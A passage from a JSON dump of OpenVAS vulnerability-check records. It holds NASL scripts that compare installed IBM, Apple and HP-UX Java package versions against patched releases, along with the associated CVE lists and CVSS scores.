rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-ibm-jdbc\", rpm:\"java-1_6_0-ibm-jdbc~1.6.0~124.6.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-ibm-plugin\", rpm:\"java-1_6_0-ibm-plugin~1.6.0~124.6.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5357", "CVE-2008-5356", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5351"], "description": "The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n java-1_6_0-ibm\n java-1_6_0-ibm-alsa\n java-1_6_0-ibm-fonts\n java-1_6_0-ibm-jdbc\n java-1_6_0-ibm-plugin\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/", "modified": "2017-07-11T00:00:00", "published": "2009-10-11T00:00:00", "id": "OPENVAS:65641", "href": "http://plugins.openvas.org/nasl.php?oid=65641", "type": "openvas", "title": "SLES11: Security update for IBM Java 1.6.0", "sourceData": "#\n#VID 7d9a96f54ebbdea55cd9630e7b8de703\n# OpenVAS Vulnerability Test\n# $\n# Description: Security update for IBM Java 1.6.0\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_summary = \"The remote host is missing updates to packages that affect\nthe security of your system. 
One or more of the following packages\nare affected:\n\n java-1_6_0-ibm\n java-1_6_0-ibm-alsa\n java-1_6_0-ibm-fonts\n java-1_6_0-ibm-jdbc\n java-1_6_0-ibm-plugin\n\n\nMore details may also be found by searching for the SuSE\nEnterprise Server 11 patch database located at\nhttp://download.novell.com/patch/finder/\";\n\ntag_solution = \"Please install the updates provided by SuSE.\";\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://bugzilla.novell.com/show_bug.cgi?id=489052\");\n script_id(65641);\n script_version(\"$Revision: 6666 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:13:36 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-11 22:58:51 +0200 (Sun, 11 Oct 2009)\");\n script_cve_id(\"CVE-2008-5341\", \"CVE-2008-5340\", \"CVE-2008-5351\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5342\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SLES11: Security update for IBM Java 1.6.0\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse_sles\", \"ssh/login/rpms\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"java-1_6_0-ibm\", rpm:\"java-1_6_0-ibm~1.6.0~124.6.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-ibm-alsa\", rpm:\"java-1_6_0-ibm-alsa~1.6.0~124.6.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-ibm-fonts\", rpm:\"java-1_6_0-ibm-fonts~1.6.0~124.6.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-ibm-jdbc\", rpm:\"java-1_6_0-ibm-jdbc~1.6.0~124.6.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"java-1_6_0-ibm-plugin\", rpm:\"java-1_6_0-ibm-plugin~1.6.0~124.6.1\", rls:\"SLES11.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-12-06T16:47:00", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5340", "CVE-2008-5343", "CVE-2008-2086", "CVE-2008-5342"], "description": "The remote host is missing Java for Mac OS X 10.5 Update 3.", "modified": "2019-12-05T00:00:00", "published": "2010-05-28T00:00:00", "id": "OPENVAS:1361412562310102041", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310102041", "type": "openvas", "title": "Java for Mac OS X 10.5 Update 3", "sourceData": 
"###################################################################\n# OpenVAS Vulnerability Test\n#\n# Java for Mac OS X 10.5 Update 3\n#\n# LSS-NVT-2010-030\n#\n# Developed by LSS Security Team <http://security.lss.hr>\n#\n# Copyright (C) 2010 LSS <http://www.lss.hr>\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public\n# License along with this program. If not, see\n# <http://www.gnu.org/licenses/>.\n###################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.102041\");\n script_version(\"2019-12-05T15:10:00+0000\");\n script_tag(name:\"last_modification\", value:\"2019-12-05 15:10:00 +0000 (Thu, 05 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2010-05-28 13:49:16 +0200 (Fri, 28 May 2010)\");\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5340\", \"CVE-2008-5342\", \"CVE-2008-5343\");\n script_name(\"Java for Mac OS X 10.5 Update 3\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 LSS\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.5\\.\");\n\n script_xref(name:\"URL\", value:\"http://support.apple.com/kb/HT3437\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing Java for Mac 
OS X 10.5 Update 3.\");\n\n script_tag(name:\"affected\", value:\"One or more of the following components are affected:\n\n Java\");\n\n script_tag(name:\"solution\", value:\"Update your Java for Mac OS X. Please see the references for more information.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-macosx.inc\");\n\nssh_osx_name = get_kb_item(\"ssh/login/osx_name\");\nif (!ssh_osx_name) exit (0);\n\nssh_osx_ver = get_kb_item(\"ssh/login/osx_version\");\nif (!ssh_osx_ver || ssh_osx_ver !~ \"^10\\.5\\.\") exit (0);\n\nssh_osx_rls = ssh_osx_name + ' ' + ssh_osx_ver;\n\npkg_for_ver = make_list(\"Mac OS X 10.5.6\",\"Mac OS X Server 10.5.6\");\n\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X 10.5.6\")) {\n if(isosxpkgvuln(fixed:\"com.apple.pkg.JavaForMacOSX10.5Update\", diff:\"3\")) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n}\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X Server 10.5.6\")) {\n if(isosxpkgvuln(fixed:\"com.apple.pkg.JavaForMacOSX10.5Update\", diff:\"3\")) { security_message( port: 0, data: \"The target host was found to be vulnerable\" ); exit(0);}\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-02T21:09:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5340", "CVE-2008-5343", "CVE-2008-2086", "CVE-2008-5342"], "description": "The remote host is missing Java for Mac OS X 10.5 Update 3.\n One or more of the following components are affected:\n\n Java", "modified": "2017-02-22T00:00:00", "published": "2010-05-28T00:00:00", "id": "OPENVAS:102041", "href": "http://plugins.openvas.org/nasl.php?oid=102041", "type": "openvas", "title": "Java for Mac OS X 10.5 Update 3", "sourceData": "###################################################################\n# OpenVAS Vulnerability Test\n#\n# Java for Mac OS X 10.5 
Update 3\n#\n# LSS-NVT-2010-030\n#\n# Developed by LSS Security Team <http://security.lss.hr>\n#\n# Copyright (C) 2010 LSS <http://www.lss.hr>\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public\n# License along with this program. If not, see\n# <http://www.gnu.org/licenses/>.\n###################################################################\n\ntag_solution = \"Update your Java for Mac OS X.\n\n For more information see:\n http://support.apple.com/kb/HT3437\";\n\ntag_summary = \"The remote host is missing Java for Mac OS X 10.5 Update 3.\n One or more of the following components are affected:\n\n Java\";\n\n\nif(description)\n{\n script_id(102041);\n script_version(\"$Revision: 5394 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-22 10:22:42 +0100 (Wed, 22 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-05-28 13:49:16 +0200 (Fri, 28 May 2010)\");\n script_cve_id(\"CVE-2008-2086\",\"CVE-2008-5340\",\"CVE-2008-5342\",\"CVE-2008-5343\");\n script_name(\"Java for Mac OS X 10.5 Update 3\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 LSS\");\n script_family(\"Mac OS X Local Security Checks\");\n script_require_ports(\"Services/ssh\", 22);\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\",\"ssh/login/osx_version\");\n script_tag(name : \"summary\" , value : 
tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"pkg-lib-macosx.inc\");\ninclude(\"version_func.inc\");\n\nssh_osx_name = get_kb_item(\"ssh/login/osx_name\");\nif (!ssh_osx_name) exit (0);\n\nssh_osx_ver = get_kb_item(\"ssh/login/osx_version\");\nif (!ssh_osx_ver) exit (0);\n\nssh_osx_rls = ssh_osx_name + ' ' + ssh_osx_ver;\n\npkg_for_ver = make_list(\"Mac OS X 10.5.6\",\"Mac OS X Server 10.5.6\");\n\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X 10.5.6\")) {\n\tif (isosxpkgvuln(fixed:\"com.apple.pkg.JavaForMacOSX10.5Update\", diff:\"3\")) { security_message(0); exit(0);}\n}\nif (osx_rls_name(rls:ssh_osx_rls) == osx_rls_name(rls:\"Mac OS X Server 10.5.6\")) {\n\tif (isosxpkgvuln(fixed:\"com.apple.pkg.JavaForMacOSX10.5Update\", diff:\"3\")) { security_message(0); exit(0);}\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:56:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5343", "CVE-2008-5348", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "description": "Check for the Version of Java", "modified": "2017-07-06T00:00:00", "published": "2009-05-05T00:00:00", "id": "OPENVAS:835195", "href": "http://plugins.openvas.org/nasl.php?oid=835195", "type": "openvas", "title": "HP-UX Update for Java HPSBUX02411", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# HP-UX Update for Java HPSBUX02411\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks 
GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_impact = \"Multiple remote vulnerabilities\";\ntag_affected = \"Java on\n HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 6.0.02 or earlier \n HP-UX B.11.11, B.11.23, B.11.31 running HP JDK and JRE 5.0.14 or earlier \n HP-UX B.11.11, B.11.23, B.11.31 running HP Java SDK and RTE 1.4.2.20 or \n earlier\";\ntag_insight = \"Potential security vulnerabilities have been identified in Java Runtime \n Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. 
These \n vulnerabilities may allow remote unauthorized access, privilege escalation, \n execution of arbitrary code, and creation of a Denial of Service (DoS)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://www11.itrc.hp.com/service/cki/docDisplay.do?docId=emr_na-c01683026-2\");\n script_id(835195);\n script_version(\"$Revision: 6584 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-06 16:13:23 +0200 (Thu, 06 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-05-05 12:14:23 +0200 (Tue, 05 May 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"HPSBUX\", value: \"02411\");\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n script_name( \"HP-UX Update for Java HPSBUX02411\");\n\n script_summary(\"Check for the Version of Java\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"HP-UX Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/hp_hp-ux\", \"ssh/login/release\");\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-hpux.inc\");\n\nrelease = 
get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"HPUX11.31\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20W-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk15.JDK15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-COM\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-PA20W-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF32-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre15.JRE15-IPF64-HS\", revision:\"1.5.0.15.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-COM\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk60.JDK60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-COM\", revision:\"1.6.0.03.00\", 
rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF32-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-IPF64-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre60.JRE60-PA20W-HS\", revision:\"1.6.0.03.00\", rls:\"HPUX11.31\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"HPUX11.23\")\n{\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jdk14.JDK14-PA20W\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-COM\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF32-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-IPF64-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA11-HS\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20\", revision:\"1.4.2.21.00\", rls:\"HPUX11.23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = ishpuxpkgvuln(pkg:\"Jre14.JRE14-PA20-HS\", 